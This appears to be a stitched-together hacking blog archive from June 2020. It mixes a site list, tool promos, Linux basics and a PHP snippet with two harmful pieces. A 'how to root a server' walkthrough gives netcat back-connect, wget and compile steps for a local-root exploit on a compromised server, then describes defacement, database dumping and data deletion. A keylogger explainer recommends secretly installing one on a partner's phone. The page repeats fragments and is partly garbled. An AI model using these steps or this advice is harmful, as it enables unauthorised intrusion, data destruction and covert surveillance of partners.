hip hop hippy chick: June 2020

Tuesday, June 30, 2020

Top 18 Websites For Hackers

SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
Makezine: Magazine that celebrates your right to tweak, hack, and bend any technology to your own will.
Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
Phrack Magazine: Digital hacking magazine.
NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
Hack Forums: Emphasis on white hat, with categories for hacking, coding and computer security.
Offensive Security Training: Developers of Kali Linux and Exploit DB, and the creators of the Metasploit Unleashed and Penetration Testing with Kali Linux course.
Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
Hackaday: A hardware hack every day.
Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.

Thursday, June 11, 2020

Magecart Targets Emergency Services-related Sites Via Insecure S3 Buckets

Hacking groups are continuing to leverage misconfigured AWS S3 data storage buckets to insert malicious code into websites in an attempt to swipe credit card information and carry out malvertising campaigns. In a new report shared with The Hacker News, cybersecurity firm RiskIQ said it identified three compromised websites belonging to Endeavor Business Media last month that are still hosting

via The Hacker News

More information

Tishna: An Automated Pentest Framework For Web Servers, Web Applications To Web Security

About Tishna:
Tishna is complete automated pentest framework for web servers, application layer to web security.

Tishna was tested on: Kali Linux, Parrot Security OS, Black Arch, Termux, Android Led TV.

Tishna's interface: Tishna has 62 options with full automation and can be use for web security swiss knife.

Tishna's installation: First, boot your Kali Linux or Parrot Security OS up. Then open Terminal and enter these commands

Appeared:

Cyber Space (Computer Security).

Terror Security (Computer Security).

National Cyber Security Services.

Brief Introduction

Tishna is useful in Banks, Private Organisations and Ethical hacker personnel for legal auditing.

It serves as a defense method to find as much as information possible for gaining unauthorised access and intrusion.

With the emergence of more advanced technology, cybercriminals have also found more ways to get into the system of many organizations.

Tishna software can audit, servers and web behaviour.

Tishna can perform Scanning & Enumeration as much as possible of target.

It's first step to stop cyber criminals by securing your Servers and Web Application Security.

Tishna is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.

Developer

Haroon Awan

mrharoonawan@gmail.com

Support to the coder
You can sponsor and support via BTC.
The bitcoin address: 3BuUYgEgsRuEra4GwqNVLKnDCTjLEDfptu
qr code

Download Tishna

More info

How To Install Metasploit In Termux

What Is Keylogger? Uses Of Keylogger In Hacking ?

What is keylogger?

How does hacker use keylogger to hack social media account and steal important data for money extortion and many uses of keylogger ?

Types of keylogger?

===================

Keylogger is a tool that hacker use to monitor and record the keystroke you made on your keyboard. Keylogger is the action of recording the keys struck on a keyboard and it has capability to record every keystroke made on that system as well as monitor screen recording also. This is the oldest forms of malware.

Sometimes it is called a keystroke logger or system monitor is a type of surveillance technology used to monitor and record each keystroke type a specific computer's keyboard. It is also available for use on smartphones such as Apple,I-phone and Android devices.

A keylogger can record instant messages,email and capture any information you type at any time using your keyboard,including usernames password of your social media ac and personal identifying pin etc thats the reason some hacker use it to hack social media account for money extortion.

======================

Use of keylogger are as follows-

1-Employers to observe employee's computer activity.

2-Attacker / Hacker used for hacking some crucial data of any organisation for money extortion.

3-Parental Control is use to supervise their children's internet usage and check to control the browsing history of their child.

4-Criminals use keylogger to steal personal or financial information such as banking details credit card details etc and then which they will sell and earn a good profit.

5-Spouse/Gf tracking-if you are facing this issue that your Spouse or Gf is cheating on you then you can install a keylogger on her cell phone to monitor her activities over the internet whatever you want such as check Whats app, facebook and cell phone texts messages etc .

=====================

Basically there are two types of keylogger either the software or hardware but the most common types of keylogger across both these are as follows-

1-API based keylogger

2-Form Grabbing Based Keylogger

3-Kernal Based Keylogger

4-Acoustic Keylogger ETC .

====================

How to detect keylogger on a system?

An antikeylogger is a piece of software specially designed to detect it on a computer.

Sometype of keylogger are easily detected and removed by the best antivirus software.

You can view the task manager(list of current programs) on a windows PC by Ctrl+Alt+Del to detect it.

Use of any software to perform any illegal activity is a crime, Do at your own risk.

Wednesday, June 10, 2020

How To Start | How To Become An Ethical Hacker

Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let's change that!

This Post is for the people that:

Have No Experience With Cybersecurity (Ethical Hacking)
Have Limited Experience.
Those That Just Can't Get A Break

OK, let's dive into the post and suggest some ways that you can get ahead in Cybersecurity.

I receive many messages on how to become a hacker. "I'm a beginner in hacking, how should I start?" or "I want to be able to hack my friend's Facebook account" are some of the more frequent queries. Hacking is a skill. And you must remember that if you want to learn hacking solely for the fun of hacking into your friend's Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination for technology and your desire to be an expert in computer systems. Its time to change the color of your hat 😀

I've had my good share of Hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have.

If you have no experience don't worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period.OK, so you have zero experience and limited skills…my advice in this instance is that you teach yourself some absolute fundamentals.

Let's get this party started.

What is hacking?

Hacking is identifying weakness and vulnerabilities of some system and gaining access with it.

Hacker gets unauthorized access by targeting system while ethical hacker have an official permission in a lawful and legitimate manner to assess the security posture of a target system(s)

There's some types of hackers, a bit of "terminology".
White hat — ethical hacker.
Black hat — classical hacker, get unauthorized access.
Grey hat — person who gets unauthorized access but reveals the weaknesses to the company.
Script kiddie — person with no technical skills just used pre-made tools.
Hacktivist — person who hacks for some idea and leaves some messages. For example strike against copyright.

Skills required to become ethical hacker.

Curosity anf exploration
Operating System
Fundamentals of Networking

*Note this sites

Related articles

Galileo - Web Application Audit Framework

HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).

We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).

In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.

After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to

find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.

You can know that from your shell, for example, this version is 2.6.18 – 2012

Go to EXECUTE on your shell and write "uname -a". You will get the same result, by the way.

Now how to find the local root.

You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :

Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.

So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD if you are under Windows. I will explain only Linux, and for Windows, its all the same.

After that Follow the steps :

1- Press nc -vlp 433

2- Wget [the link of the local-Root.zip]

3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local

gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)

Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.

AFTER THE ROOT

As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.

More information

Tuesday, June 9, 2020

Hash Identifier - The Hash Identify Tool

RenApp: The Ultimate File Renaming App

Download Here

Are you tired of managing your tens of thousands of files like jpgs, pngs, or others and you want a way to manage them as quick as possible then RenApp is solution for all problem.

RenApp lets you change names of many files of a particular type to a common name with added numbering. So no more time wasting in file management just four clicks and your files will be ordered.

Beside that RenApp can clean your folders and subfolders from backup files of .bak or .*~ extension. Removing backup files in order to make space available manually is a tedious work and can take lots of time but why do it that we've got RenApp just locate the folder and click remove it'll remove them all from that folder and its subfolders.

Some of the features of RenApp are as:

Rename files to a common name.
Rename files of different extensions to a common name in one shot
Remove backup files from folder and subfolders.

R RenApp is free and Opensource, written in Python with QT interface. Check out the source code at sourceforge.

How To Fetch Data From The Database | Tutorial 4

Welcome to my another PHP and MYSQL tutorial. In the previous I've discussed about the data insertion into database by using PHP and MYSQL. So i did successfully in the previous video.

In this video tutorial I'll discuss How to fetch data from the database called as data fetching. It's really a simple thing to access your data which is in database. You just have to do a little work for this. For fetching data you have follow some steps.

How to Fetch Data from Database

Step 1:

Make a connection with your database which i did in the previous blog.

Step 2:

If you wanna fetching a values in "form" or in a table so just have to create a form, table or whatever you want in HTML. I've created a table where I'll show you how to fetch data in table form.

Step 3:

Write a query SELECT * FROM table_Name;

Step 4:

Create a Loop for fetching all the data on a single click.

Step 5:

Create variables for the sake of storing a different values from the combined values in the loop variable like:

//while loop to fetch all the values from the database and stored in the variable named "row".

while($row = mysql_fetch_array(mysql_query($conn,$query))){

$name = $row['username']; //$name will save all the username values from the loop variable 'row'.

$pass = $row['password']; //$pass will save the password values from the loop variable 'row'.

}

Now watch the video for better understanding.

Download wpCrack

RenApp: The Ultimate File Renaming App

Download Here

Are you tired of managing your tens of thousands of files like jpgs, pngs, or others and you want a way to manage them as quick as possible then RenApp is solution for all problem.

RenApp lets you change names of many files of a particular type to a common name with added numbering. So no more time wasting in file management just four clicks and your files will be ordered.

Some of the features of RenApp are as:

Rename files to a common name.
Rename files of different extensions to a common name in one shot
Remove backup files from folder and subfolders.

R RenApp is free and Opensource, written in Python with QT interface. Check out the source code at sourceforge.

Linux Command Line Hackery Series: Part 1

In this concise article we will learn some basics of how to use Linux Command line, so lets get started.

Requirements:

1. An open Terminal in your Linux Box. I'm using Kali Linux 2.0
or you can check out this amazing website Webminal

Command: ls
Syntax:    ls [flag(s)]
Function: ls is short for list. ls command is used to list the contents of a directory these contents include files, folders, and links. ls has many optional flags as well, some of them are described below
Flags: -a this flag is used to view hidden files that is those files whose names are preceded   by a '.'(dot)
-l this flag is used to view file permissions, owner of the file, group of the owner, the file size, the modification date, and the filename. We'll talk more about it in later articles.

Command: mkdir
Syntax:   mkdir dirname
Function: mkdir is used to create a directory (or a folder) with the name which is followed by the command

now lets create a directory in our current directory named as myfiles, how would you do that?

mkdir myfiles

which command should we use in order to verify that the directory has been created in our current folder?

ls

this will list all the files and directories in our current folder. Do you see myfiles directory listed?

Command: cd
Syntax:   cd path/to/directory
Function: cd is short for change directory. It is used to navigate directories, or to make it clear it does the same thing as what double clicking on a folder do except it doesn't show you contents of the directory :(. In order to navigate or visit another directory we need to provide it's ABSOLUTE-PATH or RELATIVE-PATH you heard that, didn't ya?

Paths are of two types relative path or absolute path (also called full-path). Relative as the name suggests is relative to the current directory, so if you have to navigate to a folder within the current directory you'll just simply type cd directory_name. But what if you have to navigate to a directory which is the parent of current directory? Well it's easy just type cd .. (yes double dots, you noticed that .. and . thing when you typed ls -a, didn't you?). The double dots mean the directory above current directory (i,e the parent directory) and a single dot means the current directory (i,e the directory that I'm currently in). Now if you have to navigate two directories above current directory using relative path navigation you'll type

cd ../..

here .. means previous directory and another .. after slash (/) means the previous directory of the previous directory sounds confusing..!

The Absolute Path means full path to the file or folder which starts from root directory. Say I want to navigate to my home folder using absolute path, then I'll type:

cd /home/user

where user is the username
Now think of navigating to the myfiles folder from your home directory using the absolute path, it will be something like this:

cd /home/user/myfiles

Exercise: Create a directory project1 inside your home directory and inside the project1 directory create a file and a directory named index.html and css respectively. Then navigate to the css directory and create a style.css file inside it. At last navigate out of the css directory to home both using the relative and absolute path mechanisms.

[Trick: To get quickly out of any directory to your home directory type cd ~ [press Enter] or simply cd [press Enter]]

Command: touch
Syntax: touch filename
Function: touch is a nifty little function used to create an empty file (actually it's used to change access time of a file but everyone has got bad habits :P ). You can create any type of empty file with the touch command. If you are a bit curious about touch read the manual page of the touch command using the man touch command.

Now lets create a few files inside of our myfiles directory

touch file1 file2 file3

The above command creates three empty files in our current directory named file1, file2, and file3.
How will you verify that it has indeed created these three files in your current directory? I won't answer this time.

Command: echo
Syntax: echo Hacker manufacturing under process
Function: echo is used to display a line of text. By default echo displays a line of text on the terminal which is the standard output device (stdout for short). However we can redirect the output of an echo command to a file using > (the greater than symbol).
Now if we have to echo a line of text to a file, say file1 in our myfiles directory, we will type:

echo This is file1 > file1

The above command will echo the text "This is file1" to file1.

Command: cat
Syntax: cat filename [anotherfilename...]
Function: cat stands for concatenate (not that puny little creature in your house). The main function of cat is to concatenate files and display them on your terminal (or in geeky terms stdout). But its also used to display the contents of a file on your terminal.

Let's display the contents of file1 in the myfiles directory that we echoed to it using the echo command, for that we'll type:

cat file1

Awesome I can see on black screen contents of my file (what if your terminals background is white?), looks like I'm becoming a hacker. In case you don't see it then I suggest you should give up the thought of becoming a hacker. Just kidding you might have missed a step or two from the above steps that we performed.

Now lets say that we want to add another line of text to our file using the echo command should we use the same greater than (>) symbol? No, if we want to add another line (which in geeky terms is to append a line) to our file using the echo command we have to use >> (two greater than symbols) like this:

echo Another line of text >> file1

now to check the contents of file1 we'll type:

cat file1

OK we wrote two lines inside of the file1.
Does it mean we have to add three greater than symbols to write third line? Oh! I didn't thought you'd be such a genius.

A single greater than symbol (>) means redirect the output of the preceding command to a file specified after the > symbol. If the file exists then overwrite everything that's in it with the new contents and if the file does not exist then create one and write to it the output of the preceding command. So if you had typed

echo Another line of text > file1

it would have overwritten the contents of the file1 with "Another line of text" and the line "This is file1" would no longer be present in the file.

Two greater than symbols (>>) mean that append (remember the geeky term?) the output of the previous command to the end of file specified after >>. Now if you want to add another line of text to file1, you won't use >>> rather you'll use >> like this:

echo Third line in file1 >> file1

This is it for today. But don't worry we'll learn more things soon.

Related articles

Tuesday, June 30, 2020

Thursday, June 11, 2020

More information

More info

Related links

What is keylogger?

How does hacker use keylogger to hack social media account and steal important data for money extortion and many uses of keylogger ?

Types of keylogger?

===================

Sometimes it is called a keystroke logger or system monitor is a type of surveillance technology used to monitor and record each keystroke type a specific computer's keyboard. It is also available for use on smartphones such as Apple,I-phone and Android devices.

A keylogger can record instant messages,email and capture any information you type at any time using your keyboard,including usernames password of your social media ac and personal identifying pin etc thats the reason some hacker use it to hack social media account for money extortion.

======================

Use of keylogger are as follows-

1-Employers to observe employee's computer activity.

2-Attacker / Hacker used for hacking some crucial data of any organisation for money extortion.

3-Parental Control is use to supervise their children's internet usage and check to control the browsing history of their child.

4-Criminals use keylogger to steal personal or financial information such as banking details credit card details etc and then which they will sell and earn a good profit.

5-Spouse/Gf tracking-if you are facing this issue that your Spouse or Gf is cheating on you then you can install a keylogger on her cell phone to monitor her activities over the internet whatever you want such as check Whats app, facebook and cell phone texts messages etc .

=====================

Basically there are two types of keylogger either the software or hardware but the most common types of keylogger across both these are as follows-

1-API based keylogger

2-Form Grabbing Based Keylogger

3-Kernal Based Keylogger

4-Acoustic Keylogger ETC .

====================

How to detect keylogger on a system?

An antikeylogger is a piece of software specially designed to detect it on a computer.

Sometype of keylogger are easily detected and removed by the best antivirus software.

You can view the task manager(list of current programs) on a windows PC by Ctrl+Alt+Del to detect it.

Use of any software to perform any illegal activity is a crime, Do at your own risk.

Read more

Wednesday, June 10, 2020

Related links

HOW TO ROOT A SERVER?

HOW TO SEARCH LOCAL ROOT?

HOW TO GET ROOT ACCESS?

Tuesday, June 9, 2020

Related posts

Related news

How to Fetch Data from Database

Related news

Related posts

Requirements: